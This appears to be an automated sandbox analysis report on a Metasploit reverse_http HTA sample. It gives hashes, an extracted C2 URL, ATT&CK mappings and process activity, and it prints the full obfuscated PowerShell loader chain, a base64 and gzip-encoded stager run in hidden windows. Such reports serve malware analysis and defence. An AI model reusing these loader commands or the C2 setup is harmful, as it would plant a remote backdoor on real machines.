metasploit | b5cc3f9c8d9b898d00c5c93761058c7b7dd91c1921f8dc1358ccc1c3bced6004

General

Target

reverse_http.hta
Size

8KB
MD5

9c913698ba90b57ff848a60b4d87e165
SHA1

1236a2d03734f898520d106e7e113419a859ac88
SHA256

b5cc3f9c8d9b898d00c5c93761058c7b7dd91c1921f8dc1358ccc1c3bced6004
SHA512

7e0e2c54acf540f581cc574dad82de570577534701a683857622237bc4bf608e093a7193193d38b5ddf0a377845fc355a688d4faa8dbe6749347aedec7ce3894
SSDEEP

192:5hn2jh1hqT2l39gHqB8TpEmp1Jr6KJTIBUmcEOKU6faL0H7Ald:jn2jh1hsW9gH5qmpK5UHtKU+aL08ld

Score

10^/10

metasploit backdoor execution trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://1.14.247.162:40001/GV_avNynVjlUxVXEMRJYfgkwNqbaOT2v9_VUCcSK8cpcf6987xqrQGI_TpQZAAxoszBBTm6HevhBHokGXDoLBz0GjVb8TaoWwpliHEh8_9uQGHUmi

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
3	2688	powershell.exe
7	2688	powershell.exe
8	2688	powershell.exe
9	2688	powershell.exe
10	2688	powershell.exe
11	2688	powershell.exe
13	2688	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2348 powershell.exe
2688 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2348 powershell.exe
2688 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2348 powershell.exe
Token: SeDebugPrivilege 2688 powershell.exe

pid	process
2348	powershell.exe
2688	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2348	powershell.exe
2688	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

mshta.exepowershell.exe

description	pid	process	target process
PID 2952 wrote to memory of 2348	2952	mshta.exe	powershell.exe
PID 2952 wrote to memory of 2348	2952	mshta.exe	powershell.exe
PID 2952 wrote to memory of 2348	2952	mshta.exe	powershell.exe
PID 2952 wrote to memory of 2348	2952	mshta.exe	powershell.exe
PID 2348 wrote to memory of 2688	2348	powershell.exe	powershell.exe
PID 2348 wrote to memory of 2688	2348	powershell.exe	powershell.exe
PID 2348 wrote to memory of 2688	2348	powershell.exe	powershell.exe
PID 2348 wrote to memory of 2688	2348	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\reverse_http.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATABzAE0AMQB7ADEAfQBVAEMAQQA3AFYAWABlAFkALwBhAFMAaABMAC8ALwAwAG4AdgBPADEAaABQAFMAQgBpAEYANABaADUASgBpAEIAUgBwAGIAYwBBAGMAdwBlAGIAdwBoAGUARwBoAFYAVwBNADMAZAB7ADIAfQBQADcAaQBOADMAbQB5AE4AdgAzADMAYgBlAGEAWQB7ADEAfQBhAGkAVABIAGEAegBLADYAVQBsAGkAegA2AHEAcQBxAHQAKwBkAFQAWABiAFAASABJAFoAaQBTAE0AaABqAE4AOAByAHcAbAArAC8ALwB5AGIAYwB4AGgAUwBsAEsAQgBUAEUAUQBwAGcALwBmAGkAewAyAH0ATABoAGYAeQBjAEwASgB1AGwAbAArAFAAQwAzAGgASQArAEMAZQBKACcAJwArACcAJwBLAFMAcABKAHUASABDAEkAUwByAFQAOQArADcATwBSAHAAaQBpAE4AewAxAH0AWABWAGYANgBtAEUAbABaAGgAcwBNAE4ASgBUAGcAVABTADgASwAvAEIARAB2AEEASwBYADYAWQBiAEgAYgBZAFoAYwBKAGYAUQB1AEcAZgBsAFQANgBOAE4ANABqAGUAeQBNADQAZAA1AEEAWgBZAGUASgBBAGkAagA1ACsATgBZAHgAZAB4AHoAUwBwADYAUQBnAHsAMgB9AFQAaQAzAC8AKwBXAFMAeQB0AEgAdQByAHIAUwB1ADkATABqAG0AZwBtAEYAdgBWAHoAeABuAEIAWQA4AFMAZwB0AGwAbwBTAC8AJwAnACsAJwAnAFMALwB4AEMANAA1AHgAZwBzAGEAZwBTAE4ANAB7ADEAfQB6AGUATQBzAHEATgBvAG0AYQBqAFkAbwBaAFoAVwBpAEwATgBaAEIAewAxAH0AdwBDAHAAbQBRAGUAeABsAFIAVABEAGwAeABaACcAJwArACcAJwBnAFUAcwB6AHkATgB1AEUAMQBjAHkASgBWAEUATABNAEoAMABtAHMAYQB1ADUASAB7ADIAfQBwAHoAcgBKAGkAVwBWAGgAeAA4AGEAdgAxACsAaAAvAGkANgBuAGIAMwBQAEkAOABZAEMAWABGAGwARwBEAEcAYwB4AG8AbQBPADAAdwBOAHgAYwBWAFkAWgBvAE0AaQBqAGUASQA2ADMAYQArAEQAUwBXAFUAbwBpAGYAMQAwAHEAQQBkAHsAMgB9AGgAMwBtAE8AeABFAE8AVwBVAGwAbwBYAC8AUgBZAHkAbwA0AGUATQBkAHUAWgA5AGwARQBsADgAegBBAGQAVwBVAHAAYQBVAHkAZQBQAFEANwBLADkAJwAnACsAJwAnAFgAWQB5AHkAbQArADgAaABYAGYAVQBQAE0AUwBBAHkAVQBZAHoAMwBFAEEANgBQADMATgBBAGQAegBlAG8AeQBkAFIANQBzADQAYgAwAGYATwB5AGMAUgArAHIAeQB3AHsAMgB9AEcAbABjAFYAcABuAEoARQBMADgAeQBlAGgAVgBoAFoAVQB1AEIANgB4AE8ARAAzAEQAcwBtAEMAewAyAH0ATwBTADYAdABuAHcARwBIAGEANwA4AG0AagBVADMANQBaADgAWABWADcANwB6AEEAaQBaAFkANQA3AEsAeQBzAG0ASABqAHIARgAvADUAdgAzAEYAOQBJAHAAaQBHAG4AKwBYAEUAcwBkAC8ARwBXAFIATABoADcAagBsAEIASQAzAEgAdQA0AGkAbQA4ADUAQgBXADgAcAB2AHsAMgB9AEIAUwB1AFoATgBwAG8ASgA5AFkAJwAnACsAJwAnAHYAQgAxAGcAcgA0AHMAcAA5AGgASABqAFEAUABQAFkAKwBJADYAdABGAHgATAB7ADEAfQB6AEMAdgBuAGgASABvADQAbABWAHgAdwBiAEEAWgBhAGcAYwA5AEwAMwB5AHAAegA5AFoAMQBZAEgARQBZAHEARABnAEcAOQA2AHgAcQBDAHQAYgBDAEYASgBNAEYAMwA2AGwAdABpAG4ATwArADMAOAB6AFUAUQBGAFQAcwBVAFoAVgBsAFoAbQBPAGEAUQBwAFcANQBaADAARABHAGkAewAxAH0AQwBzAEwAVQBwAFMAUgB7ADEAfQA1AEcAVQBzAC8AZwB5AEwAYgA2AG8AcQArAGEAVQBFAFIAZABsADcAQwA1AHUAWABmAG8AVwB6AGQAdQB0AG4AVABqAEsAVwBKAHEANwA0AEYAWgBBAHcATgBBAFQANwBCAEoARQBPAFMAQgBsAFkAVQBBADgATABKADkAMQAnACcAKwAnACcANAB0ADkAdgBMADcANABKAFIAdwBkAFIAQwB0AHsAMgB9AEQAewAyAH0AZwA3AGcARAB0AGoAaABNAE8AaQBNAEIAMAB2AHEAbABXACsAQgBVAGEAcgBvAG0AQQAzAEQAaABPAEkAUQBpAEMANQBWAFEANgBIAEkAaAB4AHAAeABTADUASgBMAGUAQwBFAGYAZQA4AFcAMwBGAGIAMABuAHcAegBYAHkATwBUAEIAMwBSAEYANgBwAEMAZAA3AFcAYQBjAHoASwBnAHsAMgB9AFYAUwBCAGkAJwAnACsAJwAnAFcASQBnAHcAegBSADkAZgA4AHAAOABYADMAeAA0AGQAcAAwAFUAbgB4AHoAagBuAGgAUABzAFoAVgA4AFoAagB3AEgAQwB1AGgAdwA0AHsAMgB9ACcAJwArACcAJwBGADYAZwArAGcAQwBTAE0AbwBBAEQAQwBXAE4AUQB4AGwAbAArAEsAbAAxAEwAVABUAGkASAA5AFUASgBtAFUAbwB3AG4ATwAnACcAKwAnACcANQBBAEoAOQBqAGEAewAyAH0ALwByAHcAQwBKADgASwBuADkAbAA5ADcAMwAwAGUANwBRAFoAJwAnACsAJwAnAFYAJwAnACsAJwAnADAAaAB6AEcAcQB0AHYASgBwAG4AMwBsAGcAMABTAE8ALwB0AEgAOQBvAEUAbQB1AE4ALwBKAHcAVwA3AGQAYQBUAE8AOABOAFcAVwBjAHEARABXAGEAewAyAH0ASgByAGMAQwBWADYANABaAGYARgA3ADMAZgBWAE0AYQBHAEsAVABtAE8ANABGAEwAYQA5AFAAdQBvAEsAbwA3AFcAWQAwAGMAQgB6AGEAWABkAFoAWABoAHQAbABxAEQAUgBVADEAcQBOAGwAdQBUAFoAbQAwAFAANgBEAG4AJwAnACsAJwAnAEEAdAA1AGMAOABMAFMAVABIADAAeABqAG0AJwAnACsAJwAnAFUARgBFAG4AWQAzAG0AWQB5AGIAVQBoADcAWQAwADYAOAA0ADMAZABVAEoAWQB7ADEAfQBIAFYAUgBiAFMAcgBDADEANAAwAHgALwBjAHIAcgBWAGEAcgBYAHQAbwBmADQAagA5AFMAUQA1ADkAaABvADAAUgA5AFkAOABOAGcAWgB1AEsARgBlAHIAbAB1AG8AeAB3ADYAeAByAGgAdgB7ADIAfQB1AG0ASABNADcARABiAHYAOQBoAE8AeABUADUAdQBnAGYANgB1AE8AZAA1AEgAOQBXAHYARwBRAFQAegBnADkAZQBVAC8AVQBOAE8AdgBOAFYAUQA4AHIAVgBiAHUAWgBiAEkARQBmAGIAegBkADQAUABCADMANQBEAGcANwBVAGIAJwAnACsAJwAnAE8AVQA5AHcAOQBnAGcAOAB5AGIARABuAFUAYQBmAEIARAB1AE8AdgB3AHkAUABzADgAZQA4ADAANwBDADAAVABOADcAVABDAFQAZABNAC8AcQBFAGEAdgBCAFgAUQBTADYAaQBZAHsAMQB9AFIAdAB0AHEAMwBkAEkATQA1AEkATQBPAGoAVQBDAE8AUQBJAGUAbgBTAFkAdQByAGMAcABqAFgAbAAxAHQAbgBzAFoAeABnACsAOQBGAEcANABjAG4AQwB5AHQASwBaAG0AMwBWAGQAcAB6AFIAYwBOAGwAagBUAGkAQgBUAGkAbQBHADEAVABqAFoAegBIAFIAWAAxAHAAegBSAHEAYQBvAFgAOABOAGQAbQA1AGYAQwA3AFgAZAB2AHEAVQAxAGcANQBOAEwAbABZAEYAdQB0AFUAMQBYAFUAZABEAE0AVgBGAHEAYgBwAHYAWQAwAHsAMQB9ADQALwBNAGoAYgBFAGMATABoAGYATABlAEwAWQBQAEQAcQBqAG0ATwBmAE4AKwBXADUAMQBGADgAWABIAGUAUwBHAHgAbgBGADUAaQBPADMAVgA1ADQAVABUAGwARABaAHEAQwBnAGIAcgBDAGQATABLAHoANQB2AEIAWgBZAEcAMwBzAHYAbQBmADEAZwBRAFoAYgBWAGYAcgBWAHQAagAnACcAKwAnACcAMAA1AFUAaQB5AFYAcABGAEEAYwBLADYARgAvADMARABDAHYAYwBwAFoAYgBlAGUAZwA5AG4ATgB2AEsAVAA3AFEAWABiACsAagBJAGUAegB4AHcASABBADkANwBnAC8ANwByAFMAJwAnACsAJwAnAEoAOABQAGUARQBlAHoAdgBHAFUAYwBOAGQANgB0ADEAcwAxADEAdgA0AFcARABFAGoAVQBaADcATwBaAFoAewAyAH0AbQBQAFIAOQBTAGUAcABKAEUAbQBEAGkASgBNAHEAVQBnAGoAeQBRAE0AeAB7ADIAfQA5ADEAcgAxAFkANgBzAEMANQBvAHQAbABJAC8AbQB3AFQAUABLADcAJwAnACsAJwAnAFcAbgBZAFgAewAyAH0AcQBlAC8ARwA4AG4ASABRADUAZgBJAGYAcgBWADEAJwAnACsAJwAnADMAOABTADYAbwA4AHEASABxAHIAWgBQAFcAYQBaAHsAMQB9ADEAcgBwAHUAcgBoAG4ATwBXAHgAbwBjAGoAUQB5AFAAUQBUAFQAYQBxAGIAZgBQAFQASAA1AEEAYgBLADUATgBFAHIATgBsAFkARgA1AEoAdwBTAGIAdQA4AGgAZgB6ACsAVwB5AEgAbwBMADgAYQB2AGMAdQBSAEgASABWAEoARgBhAFIAWQBnAEMAcgB7ADIAfQBEAHoAZQA5AGUAdwBwAFEANABWAFcANwBkAGIAQgBvAFQAegBpAEcASwBsAHoAZgBSAEgAcQBjAFIAcAB2AEMATQBnAEkAZgBHAFAAZgBVAGwAUwBtAE8AWABOADkATgBMADMANABOAEcAZgBtAHsAMQB9AHYAJwAnACsAJwAnAHYATgB1AGIAdwA0AHQAZQBiADgAMQBLAHcAagBOAGgANgBhAFgATgAzAHIAYwArAGYAbAB5AEMAbAByAHkAbQBIAEUANgBWAE0AWQA1ADgARgBwAFIAcgBwAHsAMQB9AGEAdABCAHMAewAxAH0AeABkAHEAcQAxAEwAewAyAH0AWABqADUAMAAzAHIAeABNAGwAWgA1AEwATABLAHYATAB0AGUAbwBMAG4ASgBwAGgAZgBaAEkASQA1AHMAQgBWAEgAOAA5AFcARABCAEkANABwAEIATgBmADgAeABYAEQAOQBDAEQAdQA3AGUAUQAvAEcARgBiAG4AQwB0AGkAQgB3AC8ATwBZADcAcABhAC8AUgB1AGgAagB7ADEAfQBIAHcAeQB2AHcAQQBMAFUANgBtAEwANwBpADcANgBkAHIAbQBJAEMARQBCAC8AeABGAEsARABEACsAdgAnACcAKwAnACcASABqADkAWABDAGwAewAyAH0AVABGAFoALwBiAGUAVABjAFMAbgAnACcAKwAnACcAcwBBAFAAOQA1AC8AaQA1AHkAWAB2AGYAOQB3ACsAbABQAFIAVgBDAHQAZgBBAGYAcAB1ACsAOQB1AE4AVgAxADMAeABGADAASgBnAEkAOABLAEEAVQBvAGMAbQBSAGYASAAxADMAZgBRAHsAMQB9AEUAcgBkADAAZQBlAFYAbAA3AGgALwBJAGgAdQAxAHQAOABIADgAVAB7ACcAJwArACcAJwAyAH0ANQB3ADkAYQBQAEIAQwB2AGYAVABKAGYAdwBQAEcAeABTAGcALwB4AHcAdwBBAEEAQQB7ADAAfQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnADIAJwAnACwAJwAnAGsAJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2348

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIALsM1{1}UCA7VXeY/aShL//0nvO1hPSBiF4Z5JiBRpbcAcwebwheGhVWM3d{2}P7iN3myNv33beaY{1}aiTHazK6Uliz6qqqt+dTXbPHIZiSMhjN8rwl+//ybcxhSlKBTEQpg/fi{2}LhfycLJull+PC3hI+CeJ'+'KSpJuHCISrT9+7ORpiiN{1}XVf6mElZhsMNJTgTS8K/BDvAKX6YbHbYZcJfQuGflT6NN4jeyM4d5AZYeJAij5+NYxdxzSp6Qg{2}Ti3/+WSytHurrSu9LjmgmFvVzxnBY8SgtloS/'+'S/xC45xgsagSN4{1}zeMsqNomajYoZZWiLNZB{1}wCpmQexlRTDlxZ'+'gUszyNuE1cyJVELMJ0msau5H{2}pzrJiWVhx8av1+h/i6nb3PI8YCXFlGDGcxomO0wNxcVYZoMijeI63a+DSWUoif10qAd{2}h3mOxEOWUloX/RYyo4eMduZ9lEl8zAdWUpaUyePQ7K9'+'XYyym+8hXfUPMSAyUYz3EA6P3NAdzeoydR5s4b0fOycR+ryw{2}GlcVpnJEL8yehVhZUuB6xOD3DsmC{2}OS6tnwGHa78mjU35Z8XV77zAiZY57KysmHjrF/5v3F9IpiGn+XEsd/GWRLh7jlBI3Hu4im85BW8pv{2}BSuZNpoJ9Y'+'vB1gr4sp9hHjQPPY+I6tFxL{1}zCvnhHo4lVxwbAZagc9L3ypz9Z1YHEYqDgG96xqCtbCFJMF36ltinO+38zUQFTsUZVlZmOaQpW5Z0DGi{1}CsLUpSR{1}5GUs/gyLb6oq+aUERdl7C5uXfoWzdutnTjKWJq74FZAwNAT7BJEOSBlYUA8LJ91'+'4t9vL74JRwdRCt{2}D{2}g7gDtjhMOiMB0vqlW+BUaromA3DhOIQiC5VQ6HIhxpxS5JLeCEfe8W3Fb0nwzXyOTB3RF6pCd7WaczKg{2}VSBi'+'WIgwzR9f8p8X3x4dp0UnxzjnhPsZV8ZjwHCuhw4{2}'+'F6g+gCSMoADCWNQxll+Kl1LTTiH9UJmUownO'+'5AJ9ja{2}/rwCJ8Kn9l9730e7QZ'+'V'+'0hzGqtvJpn3lg0SO/tH9oEmuN/JwW7daTO8NWWcqDWa{2}JrcCV64ZfF73fVMaGKTmO4FLa9PuoKo7WY0cBzaXdZXhtlqDRU1qNluTZm0P6Dn'+'At5c8LSTH0xjm'+'UFEnY3mYybUh7Y06843dUJY{1}HVRbSrC140x/crrVarXtof4j9SQ59ho0R9Y8NgZuKFerluoxw6xrhv{2}umHM7Dbv9hOxT5ugf6uOd5H9WvGQTzg9eU/UNOvNVQ8rVbuZbIEfbzd4PB35Dg7Ub'+'OU9w9gg8ybDnUafBDuOvwyPs8e807C0TN7TCTdM/qEavBXQS6iY{1}Rttq3dIM5IMOjUCOQIenSYurcpjXl1tnsZxg+9FG4cnCytKZm3VdpzRcNljTiBTimG1TjZzHRX1pzRqaoX8Ndm5fC7XdvqU1g5NLlYFutU1XUdDMVFqbpvY0{1}4/MjbEcLhfLeLYPDqjmOfN+W51F8XHeSGxnF5iO3V54TTlDZqCgbrCdLKz5vBZYG3svmf1gQZbVfrVtj'+'05UiyVpFAcK6F/3DCvcpZbeeg9nNvKT7QXb+jIezxwHA97g/7rS'+'J8PeEezvGUcNd6t1s11v4WDEjUZ7OZZ{2}mPR9SepJEmDiJMqUgjyQMx{2}91r1Y6sC5otlI/mwTPK7'+'WnYX{2}qe/G8nHQ5fIfrV1'+'38S6o8qHqrZPWaZ{1}1rpurhnOWxocjQyPQTTaqbfPTH5AbK5NErNlYF5JwSbu8hfz+WyHoL8avcuRHHVJFaRYgCr{2}Dze9ewpQ4VW7dbBoTziGKlzfRHqcRpvCMgIfGPfUlSmOXN9NL34NGfm{1}v'+'vNubw4teb81KwjNh6aXN3rc+flyClrymHE6VMY58FpRrp{1}atBs{1}xdqq1L{2}Xj503rxMlZ5LLKvLteoLnJphfZII5sBVH89WDBI4pBNf8xXD9CDu7eQ/GFbnCtiBw/OY7pa/Ruhj{1}HwyvwALU6mL7i76drmICEB/xFKDD+v'+'Hj9XCl{2}TFZ/beTcSn'+'sAP95/i5yXvf9w+lPRVCtfAfpu+9uNV13xF0JgI8KAUocmRfH13fQ{1}Erd0eeVl7h/Ihu1t8H8T{'+'2}5w9aPBCvfTJfwPGxSg/xwwAAA{0}{0}')-f'=','2','k')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
2289953367eeff2324dd436c95924927

SHA1
5bf2b0bd47cac3b8adee7ba8c05d13b8756ea39d

SHA256
27760e55e20e970ef1fd63093c23fcda748ac52bb3f8079f0023172551ed1643

SHA512
1abd75b8e656917aa5024f90a903a57669829858eae49edfbc3404d78a33ec0df1b020fb1b3a55638ee2a5e4bebc1153c9ed02f072e02126e6ef4713453ffe33

Download Submit
memory/2688-7-0x0000000002B60000-0x0000000002B61000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing